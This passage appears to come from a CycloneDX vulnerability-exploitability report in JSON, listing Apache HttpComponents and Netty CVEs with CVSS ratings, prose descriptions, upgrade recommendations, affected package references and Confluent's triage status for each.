          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.3.4"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-54428",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400,
        770
      ],
      "description": "Allocation of resources without limits or throttling in the HTTP/2 HPACK decoder in Apache HttpComponents Core (5.4.2 and earlier, 5.5-beta1 and earlier) allows an remote attacker to cause a denial of service through memory exhaustion by sending oversized compressed header blocks before the HTTP/2 SETTINGS acknowledgement causes the configured header list size limit to be applied.",
      "recommendation": "Upgrade org.apache.httpcomponents.core5:httpcore5-h2 to version 5.4.3, 5.5-beta2",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54428"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/07/01/3"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54428"
        },
        {
          "url": "https://github.com/apache/httpcomponents-core"
        },
        {
          "url": "https://github.com/apache/httpcomponents-core/commit/1ea1239bbbe3442a8382a87279c0a8119a7e358e"
        },
        {
          "url": "https://github.com/apache/httpcomponents-core/commit/cc30ee058a7b10cbf4ad3dd6270ab6d1f6a74c49"
        },
        {
          "url": "https://lists.apache.org/thread/5zjp8vczvxq19pw2rvhs21q446bhl0sd"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54428"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54428"
        }
      ],
      "published": "2026-07-01T18:16:34+00:00",
      "updated": "2026-07-24T20:03:41+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.3.4",
          "versions": [
            {
              "version": "5.3.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.3.4",
          "versions": [
            {
              "version": "5.3.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#7703b537-f87e-4949-beca-1426ce223cb7"
        },
        {
          "ref": "urn:cdx:e6ff0389-7fc6-4ca4-9cdc-8f5ab42cce66/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.3.4"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.3.4"
        },
        {
          "ref": "urn:cdx:9fc7ebf0-ec8c-4ba4-a840-63aaa92292d1/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.3.4"
        },
        {
          "ref": "urn:cdx:a94ac2ba-d8a1-4b19-9452-81f32bef7967/1#2c5165df-a4ac-42c5-b3c5-09f98980d14c"
        },
        {
          "ref": "urn:cdx:f33a27b8-0294-423c-85bb-8d008dbc42b5/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.3.4"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#c259f58d-8d64-4271-b9d1-e4cd6fc27feb"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.3.4"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.3.4"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.3.4"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.3.4"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#ddfcb315-3d22-4c64-89a9-12e13936d6e3"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#bd58ea7a-000e-4fe5-9e99-5e81f259dba1"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#42571b2a-ec21-4e02-a2e7-9f5988d8745e"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.3.4"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#e6a067ad-9f34-41cd-9bcc-de27fd85a620"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#eb57a63c-f1a2-4485-8782-14d455c8facf"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.3.4"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.3.4"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-55831",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400,
        770
      ],
      "description": "Netty is a network application framework for development of protocol servers and clients. Prior to 4.1.136.Final and 4.2.16.Final, Netty's SPDY SETTINGS decoder accepts a peer-declared SETTINGS entry count up to the 24-bit frame-length limit and materializes every unique setting ID in `DefaultSpdySettingsFrame`, allowing a remote SPDY/3.1 peer to send a syntactically valid roughly 2 MiB SETTINGS frame that creates 262144 map entries and amplifies network input into heap growth and ordered-map insertion work. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-55831"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-55831"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-6jqx-86gh-f27w"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55831"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-55831"
        }
      ],
      "published": "2026-07-21T00:17:35+00:00",
      "updated": "2026-07-23T15:17:16+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.2.15.Final",
          "versions": [
            {
              "version": "4.2.15.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#b1b42980-e87b-46fb-be86-f34ad6f9c7ee"
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:9fc7ebf0-ec8c-4ba4-a840-63aaa92292d1/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:dd368600-41e9-4f9c-a3a9-a57d553f7811/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:a94ac2ba-d8a1-4b19-9452-81f32bef7967/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#cff319d9-d2ab-4007-9da2-703d1fc7dba4"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#fa671cee-ccf5-489e-a0dc-c5cb76f01208"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#a6670819-be8c-4e71-80d2-8c83f6a9e2f2"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#79b6a2a2-1138-4f6c-86a6-7515a31a79e5"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#95def8fc-e2a0-4428-86a7-fc8b0f327481"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#3c01b3bd-7a53-46e9-a65d-82fc92230cda"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#61b8b13d-fc97-47e3-af68-ec382837e498"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#c5d116b9-00ed-45c5-bb98-c906f8511aa6"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#e4918e4b-9d4d-4e6a-ab05-bca0c81718aa"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#dc043094-2429-4640-aa08-314bb97fa93c"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#ec30aa83-f779-4849-ac6d-82699cdb225e"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#e9603ec6-3fa6-4dbf-a005-d3ff97032634"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. A comprehensive search across the entire CP repo set found no SPDY codec classes instantiated anywhere, despite the vulnerable netty-codec-http version being present in most repos."
      }
    },
    {
      "id": "CVE-2026-55833",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "Netty is a network application framework for development of protocol servers and clients. Prior to 4.1.136.Final and 4.2.16.Final, Netty SPDY header decoding continues inflating zlib-compressed header blocks after the raw header parser has exceeded `maxHeaderSize` and marked the frame truncated in `SpdyFrameCodec`, allowing a remote peer to send a small compressed `HEADERS` block that expands into much larger raw header data and causes compression-amplified CPU and allocation churn. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-55833"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-55833"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-mvh2-crg5-v77c"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55833"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-55833"
        }
      ],
      "published": "2026-07-21T00:17:35+00:00",
      "updated": "2026-07-23T13:34:45+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.2.15.Final",
          "versions": [
            {
              "version": "4.2.15.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#b1b42980-e87b-46fb-be86-f34ad6f9c7ee"
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:9fc7ebf0-ec8c-4ba4-a840-63aaa92292d1/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:dd368600-41e9-4f9c-a3a9-a57d553f7811/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:a94ac2ba-d8a1-4b19-9452-81f32bef7967/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#cff319d9-d2ab-4007-9da2-703d1fc7dba4"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#fa671cee-ccf5-489e-a0dc-c5cb76f01208"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#a6670819-be8c-4e71-80d2-8c83f6a9e2f2"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#79b6a2a2-1138-4f6c-86a6-7515a31a79e5"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#95def8fc-e2a0-4428-86a7-fc8b0f327481"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#3c01b3bd-7a53-46e9-a65d-82fc92230cda"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#61b8b13d-fc97-47e3-af68-ec382837e498"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#c5d116b9-00ed-45c5-bb98-c906f8511aa6"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#e4918e4b-9d4d-4e6a-ab05-bca0c81718aa"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#dc043094-2429-4640-aa08-314bb97fa93c"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#ec30aa83-f779-4849-ac6d-82699cdb225e"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#e9603ec6-3fa6-4dbf-a005-d3ff97032634"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. A comprehensive search across the entire CP repo set found no SPDY codec classes instantiated anywhere, despite the vulnerable netty-codec-http version being present in most repos."
      }
    },
    {
      "id": "CVE-2026-56745",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "Netty is a network application framework for development of protocol servers and clients. In versions 4.2.0.Final through 4.2.15.Final and 4.1.0.Final through 4.1.135.Final, the `SpdyHttpDecoder` handler in Netty's SPDY-to-HTTP codec allocates a pooled `ByteBuf` when processing a client-initiated `SYN_STREAM` frame with `FLAG_FIN=0` and stores the partially constructed `FullHttpRequest` in `messageMap`; when the remote peer sends `RST_STREAM` for that stream or the accumulated content exceeds `maxContentLength`, the decoder removes the entry but does not release the pooled `ByteBuf`, causing native memory exhaustion. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56745"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56745"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-jppx-w49h-x2qq"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56745"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56745"
        }
      ],
      "published": "2026-07-21T22:17:14+00:00",
      "updated": "2026-07-30T14:46:55+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.2.15.Final",
          "versions": [
            {
              "version": "4.2.15.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#b1b42980-e87b-46fb-be86-f34ad6f9c7ee"
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:9fc7ebf0-ec8c-4ba4-a840-63aaa92292d1/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:dd368600-41e9-4f9c-a3a9-a57d553f7811/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:a94ac2ba-d8a1-4b19-9452-81f32bef7967/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#cff319d9-d2ab-4007-9da2-703d1fc7dba4"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#fa671cee-ccf5-489e-a0dc-c5cb76f01208"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#a6670819-be8c-4e71-80d2-8c83f6a9e2f2"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#79b6a2a2-1138-4f6c-86a6-7515a31a79e5"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#95def8fc-e2a0-4428-86a7-fc8b0f327481"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#3c01b3bd-7a53-46e9-a65d-82fc92230cda"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#61b8b13d-fc97-47e3-af68-ec382837e498"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#c5d116b9-00ed-45c5-bb98-c906f8511aa6"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#e4918e4b-9d4d-4e6a-ab05-bca0c81718aa"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#dc043094-2429-4640-aa08-314bb97fa93c"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#ec30aa83-f779-4849-ac6d-82699cdb225e"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#e9603ec6-3fa6-4dbf-a005-d3ff97032634"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. A comprehensive search across the entire CP repo set found no SPDY codec classes instantiated anywhere, despite the vulnerable netty-codec-http version being present in most repos."
      }
    },
    {
      "id": "CVE-2026-56746",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        284
      ],
      "description": "Netty is a network application framework for development of protocol servers and clients. Versions 4.2.0.Final through 4.2.15.Final and 4.1.0.Final through 4.1.135.Final, are vulnerable to security control bypass during the origin evaluation process. CorsHandler provides a shortCircuit() configuration designed to reject unauthorized cross-origin requests immediately, acting as a security control before requests reach the application. However, due to a logical operator error in the origin evaluation process, this protection can be entirely bypassed. An attacker can bypass the short-circuit mechanism by sending a request with an Origin: null header. This failure forwards unauthorized requests to the backend application, bypassing intended access controls. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
